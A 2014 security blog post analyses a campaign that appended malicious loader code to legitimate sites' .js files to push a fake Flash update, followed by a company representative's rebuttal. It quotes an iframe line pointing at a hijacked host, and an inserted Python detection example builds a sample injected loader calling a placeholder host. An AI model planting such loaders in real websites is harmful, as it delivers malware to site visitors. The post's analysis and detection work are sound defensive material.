
Thursday, 16 January 2014

Ongoing Fake flash update via .js injection and SkyDrive, Part I

Over the past few days I have seen several cases where legitimate websites have had .js files interfered with in order to serve up something malicious.

Here is a case in point.. the German website physiomedicor.de has been hacked to serve up a fake Flash download, as can be seen from this URLquery report. In this case it's pretty easy to tell what's going on from the URLquery screenshot:

What has happened is that somehow an attacker has altered several .js files on the victim's site and has appended extra code. In this case the code has been appended to [donotclick]www.physiomedicor.de/assets/rollover.js as follows:

In this case the injected code tries to load a script from a hijacked site, [donotclick]ghionmedia.com/PROjes/goar2RAn.php?id=56356336. This isn't the first time today that I've seen this format of URL injected into a script, as I've also seen these other two (also using hijacked sites):


This second script was found in the high-profile ilmeteo.it hack earlier today, but I've seen it over the past couple of days in other attacks too. The format of the script and method of the attack are too similar to be a coincidence.
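A defender-side check for the pattern described above (legitimate .js file with attacker code appended that loads a script from an off-site host), as an added example that is not part of the original post. The sample files and the hijacked-host domain are constructed placeholders, not indicators from the post.

```python
import hashlib
import re

# Constructed sample: a site's own rollover.js and the same file with
# loader code appended by an attacker (placeholder host, not a real IoC).
BASELINE_JS = "function rollover(id){document.getElementById(id).src='over.png';}\n"
TAMPERED_JS = BASELINE_JS + (
    "var s=document.createElement('script');"
    "s.src='http://hijacked.example/PROjes/loader.php?id=12345';"
    "document.body.appendChild(s);\n"
)

# Traits of this style of injection: a script/iframe source pointing at an
# external host, typically a .php endpoint taking an id parameter.
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)
LOADER_RE = re.compile(r"\.php\?id=\d+", re.IGNORECASE)


def sha256(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def check_js(current: str, baseline: str, site_host: str) -> dict:
    """Compare a served .js file against the known-good copy.

    Reports whether it changed, whether the change is a pure append (the
    pattern in this campaign) and any off-site URLs in the appended tail.
    """
    unchanged = sha256(current) == sha256(baseline)
    appended = current[len(baseline):] if current.startswith(baseline) else None
    # Only inspect the appended tail when the file is a pure append;
    # otherwise scan the whole file, since the edit could be anywhere.
    tail = appended if appended is not None else current
    external = sorted(
        u for u in URL_RE.findall(tail) if site_host not in u.lower()
    )
    return {
        "unchanged": unchanged,
        "pure_append": appended is not None and not unchanged,
        "external_urls": external,
        "remote_loader": any(LOADER_RE.search(u) for u in external),
    }


if __name__ == "__main__":
    print(check_js(TAMPERED_JS, BASELINE_JS, "physiomedicor.de"))
```

In practice the baseline comes from the site's version control or a deployment hash list, and the check runs against what the web server actually serves rather than the copy on disk.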

This first script [pastebin] identifies itself as coming from Adscend Media LLC .. but of course that's just a comment in the script and could be fake, so let's dig a little deeper.  The key part of this script is a line that says:
document.getElementById('gw_iframe').src = 'http://ghionmedia.com/PROjes/imgfiles/b.html';
..that leads to this script [pastebin] and apart from a load of other stuff you can clearly see another reference to Adscend Media and adscendmedia.com:
    function openpp() {
        //newwindow = window.open("https://adscendmedia.com/pp_click.php?aff=8663&gate=18120&sid=&p=aHR0cDovL3Nob3ctcGFzcy5jb20v", '_blank');
    }

The adscendmedia.com link contains an aff=8663 affiliate ID, which indicates that some party other than Adscend Media LLC may be responsible. This link comes up blank when I try to follow it, which might mean a number of things (even the possibility that Adscend Media have terminated the affiliate).

The "other stuff" I mentioned includes a download from skydrive.live.com which is the same thing mentioned in this F-Secure post yesterday. (You can read more about this in Part II)

Adscend Media say that the affiliate was suspended from their network (see the comments below) and they have no control over the code that is showing. Specifically:
..these attacks are not using our advertising services in ANY way. They simply have copied the Javascript code of our content-locking product and used it for their own purposes. Therefore to call this "an Adscend Media ad" is not accurate. In the previous case, there was a commented-out line of Javascript code (where they had replaced our code with their new code), and we were able to see an account number of the person who copied our script, and we suspended the account, however at no point has our real service been used to spread malware. If a person were to copy HTML source code from this page, and use it on a blog that infects users with malware, it would be damaging to your name to repeatedly tie you to something over which you have no control, and that is what is happening here with our company.

You can read part 2 of the analysis here.


Fehzan Ali said...


My name is Fehzan Ali, with Adscend Media. This publisher was suspended from our network for illegal activity in October 2013. He was caught and quickly banned by our compliance manager. Further, our JS code is being used maliciously and has no tie-in to us. Our lawsuits from 2012 were quickly solved in months' time.

See below:

Your comments are without merit. We have over 21,000 publishers signed up to use our services and a compliance manager to police the use of our services. We educate our publishers and stand at the front of compliance. I'd like to ask you to modify some of your statements accordingly given this information.

If you have any questions, feel free to contact me directly at fehzan [at] adscendmedia [dot] com. Thank you.